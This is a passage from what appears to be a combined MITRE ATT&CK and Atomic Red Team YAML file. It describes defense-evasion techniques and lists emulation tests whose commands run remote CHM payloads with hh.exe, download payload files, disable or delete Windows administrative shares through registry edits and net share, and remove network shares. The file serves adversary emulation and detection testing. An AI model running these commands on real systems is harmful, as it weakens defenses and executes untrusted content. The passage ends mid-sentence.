Ransomware
description: InTheCyber. (2025, March 24). Exposed Fortinet Fortigate firewall
interface leads to LockBit Ransomware (CVE-2024–55591). Retrieved September
22, 2025.
url: https://posts.inthecyber.com/exposed-fortinet-fortigate-firewall-interface-leads-to-lockbit-ransomware-cve-2024-55591-de8fcfb6c45c
- source_name: CVE-2024-55591 Detail
description: NIST NVD. (2025, January 22). Retrieved September 22, 2025.
url: https://nvd.nist.gov/vuln/detail/CVE-2024-55591
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-22T00:01:58.079Z'
name: Disable or Modify Network Device Firewall
description: "Adversaries may disable network device-based firewall mechanisms
entirely or add, delete, or modify particular rules in order to bypass controls
limiting network usage. \n \nModifying or disabling a network firewall may
enable adversary C2 communications, lateral movement, and/or data exfiltration
that would otherwise not be allowed. For example, adversaries may add new
network firewall rules to allow access to all internal network subnets without
restrictions.(Citation: Exposed Fortinet Fortigate firewall interface leads
to LockBit Ransomware)\n\nAdversaries may gain access to the firewall management
console via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or
by exploiting a vulnerability. In some cases, threat actors may target firewalls
that have been exposed to the internet [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).(Citation:
CVE-2024-55591 Detail)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Marco Pedrinazzi, @pedrinazziM, InTheCyber
- Tommaso Tosi, @tosto92, InTheCyber
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.0'
atomic_tests: []
T1678:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a1df809c-7d0e-459f-8fe5-25474bab770b
created: '2025-09-24T18:03:15.021Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1678
external_id: T1678
- source_name: Joe Sec Nymaim
description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
API hammering. Retrieved September 30, 2021.
url: https://www.joesecurity.org/blog/3660886847485093803
- source_name: Joe Sec Trickbot
description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
Retrieved September 30, 2021.
url: https://www.joesecurity.org/blog/498839998833561473
- source_name: Revil Independence Day
description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
supply chain exploit to attack hundreds of businesses. Retrieved September
30, 2021.'
url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- source_name: Netskope Nitol
description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
with evasive sandbox analysis technique. Retrieved September 30, 2021.
url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T23:58:09.956Z'
name: Delay Execution
description: "Adversaries may employ various time-based methods to evade detection
and analysis. These techniques often exploit system clocks, delays, or timing
mechanisms to obscure malicious activity, blend in with benign activity, and
avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox
environments or natively on host systems. \n\nAdversaries may utilize programmatic
`sleep` commands or native system scheduling functionality, for example [Scheduled
Task/Job](https://attack.mitre.org/techniques/T1053). Benign commands or other
operations may also be used to delay malware execution or ensure prior commands
have had time to execute properly. Loops or otherwise needless repetitions
of commands, such as `ping`, may be used to delay malware execution and potentially
exceed time thresholds of automated analysis environments.(Citation: Revil
Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred
to as API hammering, involves making various calls to Native API functions
in order to delay execution (while also potentially overloading analysis environments
with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Deloitte Threat Library Team
- Jeff Felling, Red Canary
- Jorge Orchilles, SCYTHE
- Ruben Dodge, @shotgunner101
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1574.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde
created: '2022-02-25T15:27:44.927Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/013
external_id: T1574.013
- source_name: 'FinFisher exposed '
description: 'Microsoft Defender Security Research Team. (2018, March 1).
FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex
virtual machines. Retrieved January 27, 2022.'
url: https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/
- source_name: NtQueryInformationProcess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
- source_name: Windows Process Injection KernelCallbackTable
description: 'odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable
used by FinFisher / FinSpy. Retrieved February 4, 2022.'
url: https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/
- source_name: Lazarus APT January 2022
description: Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus
APT leverages Windows Update client, GitHub in latest campaign. Retrieved
January 27, 2022.
url: https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.077Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1542.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc
created: '2020-10-20T00:05:48.790Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/004
external_id: T1542.004
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.524Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1218.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d
created: '2020-01-23T18:53:54.377Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/001
external_id: T1218.001
- source_name: Microsoft CVE-2017-8625 Aug 2017
description: Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer
Security Feature Bypass Vulnerability. Retrieved October 3, 2018.
url: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625
- source_name: Microsoft HTML Help May 2018
description: Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved
October 3, 2018.
url: https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
- source_name: Microsoft HTML Help Executable Program
description: Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved
October 3, 2018.
url: https://msdn.microsoft.com/windows/desktop/ms524405
- source_name: Microsoft HTML Help ActiveX
description: Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved
October 3, 2018.
url: https://msdn.microsoft.com/windows/desktop/ms644670
- source_name: MsitPros CHM Aug 2017
description: Moe, O. (2017, August 13). Bypassing Device guard UMCI using
CHM – CVE-2017-8625. Retrieved October 3, 2018.
url: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.609Z'
name: 'Signed Binary Proxy Execution: Compiled HTML File'
description: |-
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1218.001
atomic_tests:
- name: Compiled HTML Help Local Payload
auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8
description: |
Uses hh.exe to execute a local compiled HTML Help payload.
Upon execution calc.exe will open
supported_platforms:
- windows
input_arguments:
local_chm_file:
description: Local .chm payload
type: path
default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm
dependency_executor_name: powershell
dependencies:
- description: 'The payload must exist on disk at specified location (#{local_chm_file})
'
prereq_command: 'if (Test-Path "#{local_chm_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{local_chm_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
executor:
command: 'hh.exe "#{local_chm_file}"
'
name: command_prompt
- name: Compiled HTML Help Remote Payload
auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
description: |
Uses hh.exe to execute a remote compiled HTML Help payload.
Upon execution displays an error saying the file cannot be open
supported_platforms:
- windows
input_arguments:
remote_chm_file:
description: Remote .chm payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm
executor:
command: 'hh.exe #{remote_chm_file}
'
name: command_prompt
- name: Invoke CHM with default Shortcut Command Execution
auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
description: Executes a CHM file with the default Shortcut Command method.
supported_platforms:
- windows
input_arguments:
chm_file_path:
description: Default path of CHM
type: string
default: Test.chm
hh_file_path:
description: path of modified HH.exe
type: path
default: "$env:windir\\hh.exe"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
#{chm_file_path}'
name: powershell
- name: Invoke CHM with InfoTech Storage Protocol Handler
auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
description: Executes a CHM file with the ITS protocol handler.
supported_platforms:
- windows
input_arguments:
hh_file_path:
description: path of modified HH.exe
type: path
default: "$env:windir\\hh.exe"
infotech_storage_handler:
description: Default InfoTech Storage Protocol Handler
type: string
default: its
chm_file_path:
description: Default path of CHM
type: string
default: Test.chm
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
-HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
name: powershell
- name: Invoke CHM Simulate Double click
auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
description: Executes a CHM file simulating a user double click.
supported_platforms:
- windows
input_arguments:
chm_file_path:
description: Default path of CHM
type: string
default: Test.chm
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
name: powershell
- name: Invoke CHM with Script Engine and Help Topic
auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
description: Executes a CHM file with a defined script engine, ITS Protocol
Handler, and help topic extension.
supported_platforms:
- windows
input_arguments:
topic_extension:
description: Default Help Topic
type: string
default: html
hh_file_path:
description: path of modified HH.exe
type: path
default: "$env:windir\\hh.exe"
infotech_storage_handler:
description: Default InfoTech Storage Protocol Handler
type: string
default: its
script_engine:
description: Default Script Engine
type: string
default: JScript
chm_file_path:
description: Default path of CHM
type: string
default: Test.chm
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
#{hh_file_path} -CHMFilePath #{chm_file_path}'
name: powershell
- name: Invoke CHM Shortcut Command with ITS and Help Topic
auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
description: Executes a CHM file using the Shortcut Command method with a defined
ITS Protocol Handler, and help topic extension.
supported_platforms:
- windows
input_arguments:
topic_extension:
description: Default Help Topic
type: string
default: html
hh_file_path:
description: path of modified HH.exe
type: path
default: "$env:windir\\hh.exe"
infotech_storage_handler:
description: Default InfoTech Storage Protocol Handler
type: string
default: its
chm_file_path:
description: Default path of CHM
type: string
default: Test.chm
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
#{hh_file_path} -CHMFilePath #{chm_file_path}'
name: powershell
- name: Decompile Local CHM File
auto_generated_guid: 20cb05e0-1fa5-406d-92c1-84da4ba01813
description: |
Uses hh.exe to decompile a local compiled HTML Help file.
Upon successful execution the chm file will decompile to disk.
Reference:https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
supported_platforms:
- windows
input_arguments:
local_chm_file:
description: Local .chm payload
type: path
default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm
dependency_executor_name: powershell
dependencies:
- description: 'The payload must exist on disk at specified location (#{local_chm_file})
'
prereq_command: 'if (Test-Path "#{local_chm_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{local_chm_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
executor:
command: 'hh.exe -decompile %temp% "#{local_chm_file}"
'
cleanup_command: 'del %temp%\T1218.001.html >nul 2>&1
'
name: command_prompt
T1070.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c
created: '2020-01-31T12:39:18.816Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/005
external_id: T1070.005
- source_name: Technet Net Use
description: Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.
url: https://technet.microsoft.com/bb490717.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.691Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can
be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039)
is an example utility that can be used to remove network share connections
with the net use \\system\share /delete command. (Citation: Technet
Net Use)'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1070.005
atomic_tests:
- name: Add Network Share
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
description: 'Add a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
share_name:
description: Share to add.
type: string
default: "\\\\test\\share"
executor:
command: |
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
name: command_prompt
- name: Remove Network Share
auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222'
description: 'Removes a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
share_name:
description: Share to remove.
type: string
default: "\\\\test\\share"
executor:
command: 'net share #{share_name} /delete
'
name: command_prompt
- name: Remove Network Share PowerShell
auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
description: 'Removes a Network Share utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
share_name:
description: Share to remove.
type: string
default: "\\\\test\\share"
executor:
command: |
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
name: powershell
- name: Disable Administrative Share Creation at Startup
auto_generated_guid: 99c657aa-ebeb-4179-a665-69288fdd12b8
description: "Administrative shares are hidden network shares created by Microsoft’s
Windows NT operating systems that grant system administrators \nremote access
to every disk volume on a network-connected system. These shares are automatically
created at started unless they have been\npurposefully disabled as is done
in this Atomic test. As Microsoft puts it, \"Missing administrative shares
typically \nindicate that the computer in question has been compromised by
malicious software.\"\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n"
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f
name: command_prompt
elevation_required: true
- name: Remove Administrative Shares
auto_generated_guid: 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62
description: "Administrative shares are hidden network shares created by Microsoft’s
Windows NT operating systems that grant system administrators \nremote access
to every disk volume on a network-connected system. As Microsoft puts it,
“Missing administrative shares typically \nindicate that the computer in question
has been compromised by malicious software.\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n"
supported_platforms:
- windows
executor:
command: for %i in (C$ IPC$ ADMIN$) do net share %i /delete
cleanup_command: |
net share ADMIN$ /UNLIMITED >nul 2>&1
net share C$=C:\ >nul 2>&1
net share IPC$ >nul 2>&1
name: command_prompt
elevation_required: true
T1562.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579
created: '2020-02-21T20:32:20.810Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/001
external_id: T1562.001
- source_name: Analysis of FG-IR-22-369
description: " Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of
FG-IR-22-369. Retrieved May 15, 2023."
url: https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis
- source_name: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese
Actor in Espionage Operation
description: ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD
UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware
Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15,
2023.
url: https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
- source_name: BlackBerry WhisperGate 2022
description: 'BlackBerry Research and Intelligence Team. (2022, February 3).
Threat Spotlight: WhisperGate Wiper Wreaks Havoc in Ukraine. Retrieved March
18, 2025.'
url: https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine
- source_name: Cocomazzi FIN7 Reboot
description: Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime
Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved
September 24, 2025.
url: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
- source_name: OutFlank System Calls
description: 'de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct
System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.'
url: https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
- source_name: disable_win_evt_logging
description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging.
Retrieved April 7, 2022.'
url: https://ptylu.github.io/content/report/report.html?report=25
- source_name: chasing_avaddon_ransomware
description: 'Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19).
One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January
26, 2022.'
url: https://www.mandiant.com/resources/chasing-avaddon-ransomware
- source_name: doppelpaymer_crowdstrike
description: 'Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer
Hunts and Kills Windows Processes. Retrieved January 26, 2022.'
url: https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/
- source_name: avoslocker_ransomware
description: Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using
New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.
url: https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html
- source_name: dharma_ransomware
description: Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma
Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26,
2022.
url: https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/
- source_name: MDSec System Calls
description: MDSec Research. (2020, December). Bypassing User-Mode Hooks and
Direct Invocation of System Calls for Red Teams. Retrieved September 29,
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: SCADAfence_ransomware
description: Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware
Attack. Retrieved June 18, 2022.
url: https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf
- source_name: demystifying_ryuk
description: Tran, T. (2020, November 24). Demystifying Ransomware Attacks
Against Microsoft Defender Solution. Retrieved January 26, 2022.
url: https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947
- source_name: Google Cloud Threat Intelligence FIN13 2021
description: 'Van Ta, Jake Nicastro, Rufus Brown, and Nick Richard. (2021,
December 7). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved
March 18, 2025.'
url: https://cloud.google.com/blog/topics/threat-intelligence/fin13-cybercriminal-mexico/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:13.019Z'
name: 'Impair Defenses: Disable or Modify Tools'
description: "Adversaries may modify and/or disable security tools to avoid
possible detection of their malware/tools and activities. This may take many
forms, such as killing security software processes or services, modifying
/ deleting Registry keys or configuration files so that tools do not operate
properly, or other methods to interfere with security tools scanning or reporting
information. Adversaries may also disable updates to prevent the latest security
patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries
may trigger a denial-of-service attack via legitimate system processes. It
has been previously observed that the Windows Time Travel Debugging (TTD)
monitor driver can be used to initiate a debugging session for a security
tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger
into the EDR process, all child processes from the EDR will be automatically
suspended. The attacker can terminate any EDR helper processes (unprotected
